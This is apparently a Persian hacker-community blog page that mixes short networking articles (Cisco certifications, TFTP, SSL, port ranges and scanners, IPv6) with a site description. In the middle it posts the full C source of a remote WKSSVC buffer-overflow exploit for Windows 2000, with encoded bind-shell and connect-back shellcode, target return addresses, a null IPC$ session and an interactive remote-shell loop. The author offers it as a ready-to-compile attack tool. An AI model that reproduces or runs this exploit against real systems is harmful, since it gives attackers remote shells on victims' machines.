براي مثال سرور ممكن است بر عهده داشته باشد . براي مثال ويندوز سرور 2003 ميتوانيد در نقش يك كنترل كننده دامنه ( domin Contoller ) ، يك سرور عضو ( member server )، سرور پايه( )سرور فايل ( )، سرور پرينت ( ) ، سرور پايانه ( ) و يا حالت هاي متعدد ديگر عمل كند. يك سرور همچنين مي تواند تركيبي از اين نقش ها را به عهده داشته باشد.
مشكل اينجاست كه سرئر در هر كدام از اين نقش ها ، نيازهاي امنيتي خاص خودش رادارد . براي مثال ، اگر قرار است كه سرور شما در نقش يك سرو ر IISكار كند ، شما بايد ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

- مدرک CCNP

CCNP مخفف عبارت Cisco Certified Network Professional است که معمولا افراد پس از گذراندن CCNA اقدام به گذراندن اين دوره CCNP می‌کنند. تفاوت عمده اين مدرک با CCNA اين است که فرد پس از گذراندن اين دوره توانائی شبکه‌بندی بين Nodeهای بيشتری ( از 100 نود تا 500 نود ) و افزوده شدن تعداد بيشتری پروتکلهای شبکه نظير PPP ,PSTN , ddr,x25 , isl ,isdn ,frame realy , ip , igrp , ipx, apple talk , rip,ip rip , vlsm , bgp , 802.10 , ospf , igrp دارد.


- ساير مدارک سيسکو

CCDA :
يکی ديگر از مدارک سيسکو که در ايران کمتر به آن توجه شده است، مدرک CCDA يا Cicso Certified Design Associate است. اين مدرک روی طراحی و مهندسی شبکه زوم نموده است.

CCDP :
مدرک CCDP يا Cicso Certified Design Professional يعنی طراح حرفه‌ای شبکه مورد تائيد سيسکو.

CCIE :
بعد از گذراندن CCDP، شما می‌توانيد مدرک CCIE را نيز اخذ کنيد. تفاوت اخذ اين مدرک با بقيه مدارک شرکت سيسکو در نحوه برگزاری آزمون آن می‌باشد، چون اين مدرک بصورت عملی و در لابراتوار برگزار می‌شود.



CCIP :
شرکت Cisco جديدا اقدام به برگزاری دوره CCIP نموده است که در آن بصورت محض روی مباحث IP , DSL پرداخته می‌شود .

اما سرفصل های آموزشی :
الف) پروتکلهای WAN :
- تشريح عملکرد PPP و بسته‌بندی داده‌ها در روترهای سيسکو
- استفاده از دستورات مناسب جهت نا هنجاريهای شبکه
- تشريح مفاهيم پايه‌ای Frame Relay و ويژيگی‌های آن
- پيکربندی MAPها و LMIها و Subinerface هاست
- تبيين پروتکلهای ISDN و Working Group و Channels و نقاط ارتجاع
- تفاوت ميان سرويسهای مهم WAN مانند LAPB , Frame Relay , DDR , PPP ,HDLC , ISDN/LAPD
- پيکربندی ISDN BRI و مسيريابی DDR
- بررسی مدل مرجع OSI و ارتباطات بين لايه‌ها
- بررسی مدل OSI با TCP/IP
- استفاده از مدل OSI بعنوان خطاياب شبکه (Network Troubleshooting )
- تطابق تجهيزات شبکه با لايه‌های مربوط در OSI
- تشريح نحوه کارکرد لايه‌های شبکه و علت پديد آمدن آنها
- بررسی عملکرد DATA ENCAPSULATION
- بررسی سرويسهای شبکه‌ای ....

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

همانطور که می‌دانيد شرکت Cisco بعنوان بزرگترين و معتبرترين شرکت در زمينه ساخت، طراحی و اجرای شبکه‌های کامپيوتری و تجهيزات آن در جهان شناخته شده است . از اين رو برای آشنائی بيشتر متخصصان شبکه با اصول طراحی و کار با تجهيزات، اين شرکت اقدام به برگزاری دوره‌های متعددی در زمينه‌های مختلف شبکه نموده است. همچنين برای آگاهی از صحت و کار آزمودگی دانش آموختگان اين دوره‌ها پس از گرفتن آزمون از آنها، به آنها مدرک بين‌المللی ارائه می‌نمايد .
در کشور ما شرکتها و موسسات آموزشی متعددی نسبت به برگزاری اين دوره ها اقدام نموده اند، ولی ...

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد.
جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود .
هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

ipEye 1.2 Platform: Windows Last update: 14 August 2002 Developer: Arne Vidstrom File type: .exe File size: 32 Kb License: Freeware Category: Scanners Downloads: 12092

Layer , يا همان SSL يک تکنولوژی استاندارد و به ثبت رسيده برای تامين ارتباطی امن مابين يک وب سرور و يک مرورگر اينترنت است. اين ارتباط امن از تمامی اطلاعاتی که ما بين وب سرور و مرورگر اينترنت ( کاربر) انتقال ميابد , محافظت ميکند تا در اين انتقال به صورت محرمانه و دست نخورده باقی بماند. SSL يک استاندارد صنعتی است و توسط مليونها وب سايت در سراسر جهان برای برقراری امنتيت انتقال اطلاعات استفاده ميشود. برای اينکه يک وب سايت بتواند ارتباطی امن از نوع SSL را داشته باشد نياز به يک گواهينامه SSL دارد.

زمانيکه شما ميخواهيد SSL را بر روی سرور خود فعال کنيد سؤالات متعددی در مورد هويت سايت شما ( مانند آدرس سايت ) و همين طور هويت شرکت شما ( مانند نام شرکت و محل آن) از شما پرسيده ميشود. آنگاه سرور دو کليد رمز را برای شما توليد ميکند , يک کليد ...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث می‌کنند. اين فايل‌ها به صورت متنی و با پسوند txt هستند و به‌عنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايل‌ها يک‌بار منتشر شده و هرگز تغيير داده نمی‌شوند (حتی اگر حاوی اشتباه باشند.)


- فايل‌های RFC از کجا قابل دسترسی هستند؟

RFCها از سايت‌های بسياري قابل دسترس هستند ولی...

به علت طولانی بودن در ادمه مطلب

ادامه مطلب

PDA يا Personal Digital Assistant يك رايانه همراه و جيبي است كه از آن براي تنظيم و نگهداري برخي اطلاعات شخصي استفاده ميشود .

اين رايانه در حقيقت حكم دفترچه يادداشت شما را دارد. شما مي توانيد در اين رايانه فهرستي از كارهايي كه بايد انجام دهيد ، فهرست قرارها ، نام ها ، شماره تلفن ها و نشاني ها يي را كه مي خواهيد داشته باشيد ، ثبت و نگهداري كنيد .

اين رايانه به كوچكي يك كف دست است ، بنا براين براحتي در

 

به علت طولانی بودن در ادامه مطلب

ادامه مطلب

امروز برایتان پورت را دسته بندی میکنم

قبلش با شما میخوام حرف حسلب بزنم اگر میخواهید هکر شید از این سایتها هیچی نسیبتان نمیشود دستبکار بشید برید برای یادگیری زبان c و++c

دسته بندي اول:

پورتهاي  ۰تا  ۱۰۲۳

مشهورترين پورتها هستند و معمولا هر کدام براي سرويس خاص استفاده ميشود مثلا پورت  ۲۱  جهت سرويس ftpو يا پورت  ۸۰جهت سرويس  html

پورتهاي  ۱۰۲۴  تا  ۴۹۱۵۱

اين سري از پورتها زماني استفاده ميشود که سيستم از يک ابزار شبکه در حال استفاده باشد مثل استفاده از outlook

پورتهاي  ۴۹۱۵۲  تا  ۶۵۵۳۵

اين سري از پورتها به ندرت استفاده ميشوند و معمولا توسط تروجانها باز شده و مورد استفاده قرار مي گيرد . اين تقسيم بندي ها هميشه بر قرار نبوده به همين خاطر به صورت ديگر نيز تقسيم ميشوند.

 

تقسيم دوم :

پورت هاي زير  ۱۰۲۴  و پورت هاي بالاي  ۱۰۲۴

 

چگونگي يافتن پورتهاي باز:

معمولا از برنامه هاي نوشته شده بنام پورت اسکنر ميتوان پورتهاي باز يک سيستم را پيدا کرد. معروفترين پورت اسکنر ها مثل nmapwin' .superscan . winscan . ipeye .ogre .retina.

از اسکنرهاي نام برده شده معمول دست هکرها nmapwin  و retina  ميباشد که در حال حاضر براي کار ما مناسب نيست.

 

نکته1: هيچ اسکنري به طور  ۱۰۰% جواب گوي نياز نمي باشد و من در پستهاي قبل يك برنامه گذاشتم براي دانلود.

 

نكته2: پورت هاي مهم را به ياد داشته باشيد : 7، 15، 21، 23، 25، 79،80،11

باخودم گفتم حالا كه افتاديم توي Exploit بازار. منم يكي از اون باحالشو براتون بذارم. Source هم براي اين مي ذارم كه نگي آلوده هست و ...
اين كد نوشته Snoog در تاريخ 14 نوامبر 2003 است. فرقش با نسخه هاي ديگر اينه كه Exploit هاي مشابه، با اجرا آنها بلافاصله Services.exe به Crash دچار ميشه. ولي با اين نسخه وقتي Crash انجام ميشود كه شما از Shell خارج شديد. اينها رو هم با Visual C كامپايل كنيد. من همين كدي كه اينجا براي شما نوشتم رو عينا كپي مي كنم و كامپايل مي كنم و هيچ Error و مشكلي وجود نداره! اگر احيانا به Error مواجه شديد عيب از سيستم خودتونه!

CODE

#pragma comment (linker,"/NODEFAULTLIB:msvcprtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmtd.lib") #pragma comment (linker,"/NODEFAULTLIB:libcmt.lib") #pragma comment (linker,"/NODEFAULTLIB:libcd.lib") #pragma comment (lib,"ws2_32") #pragma comment (lib,"msvcrt") #pragma comment (lib,"mpr") #pragma warning (disable:4013) #include #include #include #include #include #include #define NOP 0x90 #define PORT 24876 #define KEY 0x99999999 #define ALIGN 1 // Between 0 ~ 3 #define TARGET 1 #define INTERVAL 3 #define TIME_OUT 20 #define PORT_OFFSET_1 198 #define PORT_OFFSET_2 193 #define IP_OFFSET 186 #define SC_OFFSET 20 // Gap for some NOPs... #define RET_SIZE 2026 // Big enuff to take EIP...   #define SC_SIZE_1 sizeof(bindport) #define SC_SIZE_2 sizeof(connback) #define BSIZE 2600 #define SSIZE 128 extern char getopt(int,char **,char*); extern char *optarg; static int alarm_fired=0; HMODULE hMod; FARPROC fxn; HANDLE t1, t2; char buff[BSIZE]; struct { char *os; long jmpesp; char *dll; } targets[] = { { "Window 2000 (en) SP4", 0x77e14c29, "user32.dll 5.0.2195.6688" }, { "Window 2000 (en) SP1", 0x77e3cb4c, "user32.dll 5.0.2195.1600" }, { "For debugging only", 0x41424344, "dummy.dll 5.0.2195.1600" } }, v; /* * HD Moore's shellcode.....   */ char bindport[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xa6\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa1\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x7c\xd0\x1f" "\xd0\x3d\x34\xb7\x70\x3d\x83\xe9\x5e\x40\x90\x6c\x34\x52\x74\x65" "\xa2\x17\xd7\x97\x75\xe7\x41\x7b\xea\x34\x40\x9c\x57\xeb\x67\x2a" "\x8f\xce\xca\xab\xc6\xaa\xab\xb7\xdd\xd5\xd5\x99\x98\xc2\xcd\x10" "\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd\x12\x98\x12\xd9\x95\x12\xe9\x85" "\x34\x12\xc1\x91\x72\x95\x14\xce\xb5\xc8\xcb\x66\x49\x10\x5a\xc0" "\x72\x89\xf3\x91\xc7\x98\x77\xf3\x93\xc0\x12\xe4\x99\x19\x60\x9f" "\xed\x7d\xc8\xca\x66\xad\x16\x71\x09\x99\x99\x99\xc0\x10\x9d\x17" "\x7b\x72\xa8\x66\xff\x18\x75\x09\x98\xcd\xf1\x98\x98\x99\x99\x66" "\xcc\xb9\xce\xce\xce\xce\xde\xce\xde\xce\x66\xcc\x85\x10\x5a\xa8" "\x66\xce\xce\xf1\x9b\x99\xf8\xb5\x10\x7f\xf3\x89\xcf\xca\x66\xcc" "\x81\xce\xca\x66\xcc\x8d\xce\xcf\xca\x66\xcc\x89\x10\x5b\xff\x18" "\x75\xcd\x99\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x10\x4e\x5f" "\xdd\xbd\x89\xdd\x67\xdd\xbd\xa4\x10\xe5\xbd\xd1\x10\xe5\xbd\xd5" "\x10\xe5\xbd\xc9\x14\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0" "\xc8\xc8\x66\xec\x99\xc8\x66\xcc\xa9\x10\x78\xf1\x66\x66\x66\x66" "\x66\xa8\x66\xcc\xb5\xce\x66\xcc\x95\x66\xcc\xb1\xca\xcc\xcf\xce" "\x12\xf5\xbd\x81\x12\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81" "\x12\xc3\xb9\x98\x72\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65" "\xa8\x59\x35\xa1\x79\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5" "\xbd\x8d\xec\x78\x12\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85" "\x98\x72\x12\x9d\x12\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4" "\xc2\x5b\x91\x99"; char connback[]= "\xeb\x19\x5e\x31\xc9\x81\xe9\xab\xff\xff\xff\x81\x36\x99\x99\x99" "\x99\x81\xee\xfc\xff\xff\xff\xe2\xf2\xeb\x05\xe8\xe2\xff\xff\xff" "\x71\xa9\x99\x99\x99\xda\xd4\xdd\x99\x7e\xe0\x5f\xe0\x75\x60\x33" "\xf9\x40\x90\x6c\x34\x52\x74\x65\xa2\x17\xd7\x97\x75\xe7\x41\x7b" "\xea\x34\x40\x9c\x57\xeb\x67\x2a\x8f\xce\xca\xab\xc6\xaa\xab\xb7" "\xdd\xd5\xd5\x99\x98\xc2\xcd\x10\x7c\x10\xc4\x99\xf3\xa9\xc0\xfd" "\x12\x98\x12\xd9\x95\x12\xe9\x85\x34\x12\xc1\x91\x72\x95\x14\xce" "\xbd\xc8\xcb\x66\x49\x10\x5a\xc0\x72\x89\xf3\x91\xc7\x98\x77\xf3" "\x91\xc0\x12\xe4\x99\x19\x60\x9d\xed\x7d\xc8\xca\x66\xad\x16\x71" "\x1a\x99\x99\x99\xc0\x10\x9d\x17\x7b\x72\xa8\x66\xff\x18\x75\x09" "\x98\xcd\xf1\x98\x98\x99\x99\x66\xcc\x81\xce\xce\xce\xce\xde\xce" "\xde\xce\x66\xcc\x8d\x10\x5a\xa8\x66\xf1\x59\x31\x91\xa0\xf1\x9b" "\x99\xf8\xb5\x10\x78\xf3\x89\xc8\xca\x66\xcc\x89\x1c\x59\xec\xdd" "\x14\xa5\xbd\xa8\x59\xf3\x8c\xc0\x6a\x32\x5f\xdd\xbd\x89\xdd\x67" "\xdd\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14" "\xdd\xbd\x89\xcd\xc9\xc8\xc8\xc8\xd8\xc8\xd0\xc8\xc8\x66\xec\x99" "\xc8\x66\xcc\xb1\x10\x78\xf1\x66\x66\x66\x66\x66\xa8\x66\xcc\xbd" "\xce\x66\xcc\x95\x66\xcc\xb9\xca\xcc\xcf\xce\x12\xf5\xbd\x81\x12" "\xdc\xa5\x12\xcd\x9c\xe1\x98\x73\x12\xd3\x81\x12\xc3\xb9\x98\x72" "\x7a\xab\xd0\x12\xad\x12\x98\x77\xa8\x66\x65\xa8\x59\x35\xa1\x79" "\xed\x9e\x58\x56\x94\x98\x5e\x72\x6b\xa2\xe5\xbd\x8d\xec\x78\x12" "\xc3\xbd\x98\x72\xff\x12\x95\xd2\x12\xc3\x85\x98\x72\x12\x9d\x12" "\x98\x71\x72\x9b\xa8\x59\x10\x73\xc6\xc7\xc4\xc2\x5b\x91\x99\x09"; void err_exit(char *s) { printf("%s\n",s); exit(0); } /* * Ripped from TESO code and modifed by ey4s for win32 * and... lamer quoted it wholesale here..... =p */ void doshell(int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2]; time.tv_sec=1; time.tv_usec=0; while (1) { ul[0]=1; ul[1]=sock; l=select(0,(fd_set *)&ul,NULL,NULL,&time); if(l==1) { l=recv(sock,buf,sizeof(buf),0); if (l<=0) { err_exit("-> Connection closed...\n"); } l=write(1,buf,l); if (l<=0) { err_exit("-> Connection closed...\n"); } } else { l=read(0,buf,sizeof(buf)); if (l<=0) { err_exit("-> Connection closed...\n"); } l=send(sock,buf,l,0); if (l<=0) { err_exit("-> Connection closed...\n"); } } } } void changeip(char *ip) { char *ptr; ptr=connback+IP_OFFSET; /* Assume Little-Endianess.... */ *((long *)ptr)=inet_addr(ip)^KEY; } void changeport(char *code, int port, int offset) { char *ptr; ptr=code+offset; port^=KEY; /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); } void banner() { printf("\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\n\n"); } void usage(char *s) { banner(); printf("Usage: %s [options]\n",s); printf("\t-r\tSize of 'return addresses'\n"); printf("\t-a\tAlignment size [0~3]\n"); printf("\t-p\tPort to bind shell to (in 'connecting' mode), or\n"); printf("\t\tPort for shell to connect back (in 'listening' mode)\n"); printf("\t-s\tShellcode offset from the return address\n"); printf("\t-h\tTarget's IP\n"); printf("\t-t\tTarget types. ( -H for more info )\n"); printf("\t-H\tShow list of possible targets\n"); printf("\t-l\tListening for shell connecting\n"); printf("\t\tback to port specified by '-p' switch\n"); printf("\t-i\tIP for shell to connect back\n"); printf("\t-I\tTime interval between each trial ('connecting' mode only)\n"); printf("\t-T\tTime out (in number of seconds)\n\n"); printf("\tNotes:\n\t======\n\t'-h' is mandatory\n"); printf("\t'-i' is mandatory if '-l' is specified\n\n"); exit(0); } void showtargets() { int i; banner(); printf("Possible targets are:\n"); printf("=====================\n"); for (i=0;iprintf("%d) %s",i+1,targets[i].os); printf(" --> 0x%08x (%s)\n",targets[i].jmpesp,targets[i].dll); } exit(0); } void sendstr(char *host) { WCHAR wStr[128]; char ipc[128], hStr[128]; DWORD ret; NETRESOURCE NET; hMod=LoadLibrary("netapi32.dll"); fxn=GetProcAddress(hMod,"NetValidateName"); _snprintf(ipc,127,"\\\\%s\\ipc$",host); _snprintf(hStr,127,"\\\\%s",host); MultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0])); NET.lpLocalName = NULL; NET.lpProvider = NULL; NET.dwType = RESOURCETYPE_ANY; NET.lpRemoteName = (char*)&ipc; printf("-> Setting up $IPC session...(aka 'null session')\n"); ret=WNetAddConnection2(&NET,"","",0); if (ret!=ERROR_SUCCESS) { err_exit("-> Couldn't establish IPC$ connection..."); } else printf("-> IPC$ session setup successfully...\n"); printf("-> Sending exploit string...\n"); ret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0); } VOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) { err_exit("-> I give up...dude....."); } void setalarm(int timeout) { MSG msg = { 0, 0, 0, 0 }; SetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell); while(!alarm_fired) { if (GetMessage(&msg, 0, 0, 0) ) { if (msg.message == WM_TIMER) printf("-> WM_TIMER received...\n"); DispatchMessage(&msg); } } } void resetalarm() { if (TerminateThread(t2,0)==0) { err_exit("-> Failed to reset alarm..."); } if (TerminateThread(t1,0)==0) { err_exit("-> Failed to kill the 'sending' thread..."); } } void do_send(char *host,int timeout) { t1=(HANDLE)_beginthread(sendstr,0,host); if (t1==0) { err_exit("-> Failed to send exploit string..."); } t2=(HANDLE)_beginthread(setalarm,0,timeout); if (t2==0) { err_exit("-> Failed to set alarm clock..."); } } int main(int argc, char *argv[]) { char opt; char *host, *ptr, *ip=""; struct sockaddr_in sockadd; int i, i_len, ok=0, mode=0, flag=0; int align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET; int target=TARGET, scsize=SC_SIZE_1, port=PORT; int timeout=TIME_OUT, interval=INTERVAL; long retaddr; WSADATA wsd; SOCKET s1, s2; if (argc<2) { usage(argv[0]); } while ((opt=getopt(argc,argv,"a:i:I:r:s:h:t:T:p:Hl"))!=EOF) { switch(opt) { case 'a': align=atoi(optarg); break; case 'I': interval=atoi(optarg); break; case 'T': timeout=atoi(optarg); break; case 't': target=atoi(optarg); retaddr=targets[target-1].jmpesp; break; case 'i': ip=optarg; changeip(ip); break; case 'l': mode=1; scsize=SC_SIZE_2; break; case 'r': retsize=atoi(optarg); break; case 's': sc_offset=atoi(optarg); break; case 'h': ok=1; host=optarg; sockadd.sin_addr.s_addr=inet_addr(optarg); break; case 'p': port=atoi(optarg); break; case 'H': showtargets(); break; default: usage(argv[0]); break; } } if (!ok || (mode&&((strcmp(ip,"")==0)))) { usage(argv[0]); } memset(buff,NOP,BSIZE); ptr=buff+align; for(i=0;i*((long *)ptr)=retaddr; ptr+=4; } if (WSAStartup(MAKEWORD(1,1),&wsd)!=0) { err_exit("-> WSAStartup error...."); } if ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { err_exit("-> socket() error..."); } sockadd.sin_family=AF_INET; sockadd.sin_port=htons((SHORT)port); ptr=buff+retsize+sc_offset; if (BSIZE<(retsize+sc_offset+scsize)) err_exit("-> Bad 'sc_offset'.."); banner(); if (mode) { printf("-> 'Listening' mode...( port: %d )\n",port); changeport(connback, port, PORT_OFFSET_2); for(i=0;i do_send(host,timeout); Sleep(1000); sockadd.sin_addr.s_addr=htonl(INADDR_ANY); i_len=sizeof(sockadd); if (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) { err_exit("-> bind() error"); } if (listen(s1,0)<0) { err_exit("-> listen() error"); } printf("-> Waiting for connection...\n"); s2=accept(s1,(struct sockaddr *)&sockadd,&i_len); if (s2<0) { err_exit("-> accept() error"); } printf("-> Connection from: %s\n\n",inet_ntoa(sockadd.sin_addr)); resetalarm(); doshell(s2); } else { printf("-> 'Connecting' mode...\n",port); changeport(bindport, port, PORT_OFFSET_1); for(i=0;i do_send(host,timeout); Sleep(1000); printf("-> Will try connecting to shell now....\n"); i=0; while(!flag) { Sleep(interval*1000); if(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) { printf("-> Trial #%d....\n",i++); } else { flag=1; } } printf("-> Connected to shell at %s:%d\n\n",inet_ntoa(sockadd.sin_addr),port); resetalarm(); doshell(s1); } return 0; }

 درباره LinuxPH:

 LinuxPH نامی است که من برای این وب سایت انتخاب کرده ام. در اینجا شما نیاز به استفاده منحصرا از موس ندارید چون محیط کاربری این سیستم همانند terminal لینوکس می باشد.در طراحی وب سایت ها همواره بیشتر توجه بر روی استفاده از موس بوده است و برای دستیابی به قسمت های مختلف وب سایت ها تنها اشاره برروی کلید های موس کافی است در این بین استفاده از کی بورد بسیار کمرنگ بود این امر ما را در طراحی این سیستم منحصر بفرد روی وب مجاب کرد که نه تنها با استفاده از موس بلکه در کنار آن کی بورد هم نقش اساسی خود را نشان می دهد. مهمترین حسن استفاده از کی بود در LinuxPH دسترسی سریع و آسان به قسمت های مختلف وب سایت تنها با وارد کردن یک دستور چند حرفی می باشد. این قابلیت جدید امکان ایجاد بسیاری از قسمت های منحصر بفرد را روی این وب سایت ایجاد کرده که یکی از آنها شبیه سازی فضای ترمینال لینوکس و یا Hidden Commands است. مسلما چون این سیستم برای اولین باریست که طراحی شده است دارای مشکلاتی می باشد ولی آینده ی بسیار روشنی دارد و قابلیت های بسیار بزرگتری را میتوان به آن اضافه نمود.اگر شما توانایی برنامه نویسی تحت وب و یا حتی ایده ای جالبی برای گسترش این سیستم دارید حتما ما را در جریان آن قرار دهید یا با ما همکاری لازم را بکنید.

 

درباره برنامه نویس LinuxPH:

پدارم حیاتی(Pi3cH) دانشجوی رشته مهندسی فناوری اطلاعات (IT) هستم. ایده ی طراحی LinuxPH زمانی به ذهنم رسید که می خواستم طرح جدیدی را برای وب سایت پرشین هکرز طراحی کنم. در ابتدا قصد داشتم ویرایش جدید پورتال پرشین هکرز 2.0.0 را طراحی کنم قابلیت دستیابی به صفحات سایت را تنها با استفاده از کی بورد را داشته باشد ولی پس از مدتی کار روی این سیستم به این نتیجه رسیدم که کی بورد تنها جواب گوی کلیه نیاز ها نمی تواند باشد و درکنار آن حتما نیاز به استفاده از موس هست این شد که تصمیم گرفتم در این سیستم جای موس را خالی نکنم. چون دستورات یا command های محیط ویندوز در برابر لینوکس قابل مقایسه نیست سعی کردم بیشتر از شکل و ساختار دستورات لینوکس در این سیستم استفاده کنم و از آنجا نام LinuxPH که تلفیقی از کلمه لینوکس و مخفف حروف پرشین هکرز (و هم نام و نام خانوادگی خودم!) می باشد را روی آن قرار دهم. برنامه نویسی و طراحی قالب LinuxPH زمان بسیار زیادی را از من گرفت چون سعی کردم از آیکون های موجود در محیط KDE RedHat یا آیکون ها Suse استفاده کنم تا ظاهر LinuxPH نیز آشنای لینوکس کاران باشد. دستوراتی که در این ویرایش از LinuxPH قرار داده ام محدود می باشد ولی به مرور به دستورات آن اضافه می کنم. اگر شما عزیزان نیز توانایی همکاری با من در توسعه این سیستم را دارید حتما با من مکاتبه کنید در این سیستم حتی شما می توانیید یک دستور بنویسید و با نام و کپی رایت خودتان به ثبت برسانید. محیط برنامه نویسی LinuxPH برنامه PHP4  و بانک اطلاعاتی آن MySql می باشد. قسمت دستورات به تمامی به صورت شیئی گرا(OOP) برنامه نویسی شده است. هم این جا از اشکان عزیز(http://www.amoozeshi.com/) بخاطر طراحی لوگو بالای سایت کمال تشکر را دارم. واقعا یک لوگوی بسیار زیبا با فونتی زیباتر طراحی کرده اند (خودم هم یک خورده تغییرش دادم!). طرح اصلی آرم پرشین هکرز توسط علی عزیز(Aliix - http://www.corelist.net/) انجام شده که بعلت مشغله کاری نتوانست ما را در طراحی لوگو جدید یاری کند. باز از زحمات این دو عزیز تشکر می کنم. محیط LinuxPH را طوری طراحی کرده ام که براحتی می توان قالب آن را تغییر داد (مثل اسکین ها در مدیا پلیر) در صورتی که تمایل دارید قالبی را برای LinuxPH طراحی کنید حتما با من تماس بگیرید. در انتها اضافه می کنم که LinuxPH دارای یکسری دستورات مخفی می باشد که واقعا قابلیت های جالبی را روی وب ایجاد کرده است که تنها قابل استفاده برای کاربران خاص پرشین هکرز می باشد در آینده بیشتر با این دستورات آشنا خواهید شد. به امید روزی که وب سایت های ایرانی و یا فارسی زبان نمونه ی خارجی نداشته باشند و همواره با ایده های جدید که بر روی آنها اجرا می شود جهانیان را حیرت زده کنند!

در بخش اول اين مقاله درباره نقش يك پروتكل اينترنتي و نحوه به وجود آمدن IPV6 بحث كرديم. در اين بخش از مقاله درباره برخي فرمها و ويژگيهاي اين پروتكل بحث خواهيم كرد.

كارايي

شبكه هاي LanوWan با سرعت 100Mbps باسرعت در حال بالابردن سرعت و كيفيت به سوي پهناي باند Gigabit در حركت مي باشند با اين سرعت ها و افزايش بار روي اينترنت، وجود مسيريابها با قابليت هاي خاص همچنان در وضعيت بحراني است. مسيريابها بايد قادر به پردازش اطلاعات، انتقال اطلاعات با سرعت بالا باشند در عين حال كه ترافيك را در مسير هاي مختلف كنترل مي كنند.



ساختار IPv6 با الزامات كارايي به گونه اي طراحي شده كه نيازمنديهاي ما را پوشش مي دهد:



اطلاعات موجود در هدر Ipv6 كمتر از IPV4 است قابليت هاي IPv6 به صورت جداگانه از هدر و بين هدر Ipv6 و لايه انتقال قرار دارد، بيشتر قابليت هاي هدرها توسط مسيريابهايي كه در مسير انتقال packet وجود دارند بررسي نمي شوند، اين امر باعث بالارفتن سرعت پردازش IPv6 نسبت به IPv4 توسط مسيريابها مي شود.
هدر Packet هاي Ipv6 داراي طول هاي ثابت هستند درحاليكه هدر packet هاي IPv4 داراي طول هاي متغير مي باشد در اين حالت طراحي IPv6 به صورت پردازش يكسان صورت پذيرفته است.
مسيريابهايي كه با Ipv6 كار مي كنند قادر به تكه كردن packet ها نمي باشند اگرچه در IPv4 مسيريابها قادر به تكه كردن packet ها بوده اند،IPv6 تنها زماني اين اجازه را به شماره مي دهد كه تكه شدن packet ها در مبدا صورت گيرد يعني جايي كه packet ساخته شده است.
سرويسهاي شبكه

IPv6 بايد قادر باشد كلاسهاي هر سرويس خاص را مشخص كند تا الويت بندي براي انتقال اطلاعات صورت گيرد به عنوان مثال اگر سرويس وب كه روي پورت 80 كار مي كند روي شبكه داريم ،IP بايد توانايي مشخص كردن اين سرويس را روي packet ها داشته باشد تا براي انتقال اطلاعات بتواند الويت بندي كرده تا در اين الويت بيندي packet هاي مربوط به video,voice كه بايد سريعتر انتقال يابند مشخص شوند به اين صورت سرعت بالاتر رفته و از ترافيك كاسته مي شود.



قابليت انعطاف آدرس دهي

IPv4 بهترين راه حل براي آدرس دهي هايUnicast بوده است در حاليكه درIpv6 اين قابليت به آدرس دهي Anycast تغيير يافته است.



توانايي هاي امنيتي

Ipv4 هيچگونه توانايي امنيتي در هيچ سطحي اعمال نمي كند تنها در يك ارتباط end to end در سطح استفاده كه اين فرم از امنيت، فرم استانداردي براي سرويس هاي امنيتي IP با قابليت هاي خاص نمي باشد به عنوان مثال سرويس امنيتي Ip با ايجاد شبكه هاي امن مجازي ارتباط شبكه را با اينترنت فراهم مي كنند و برعكس.IPv6 شامل خصيصه هايي ازجمله شناسايي مي باشد كه امنيت را تا حدودي تامين مي كند.



)فرم كلي ipv6)





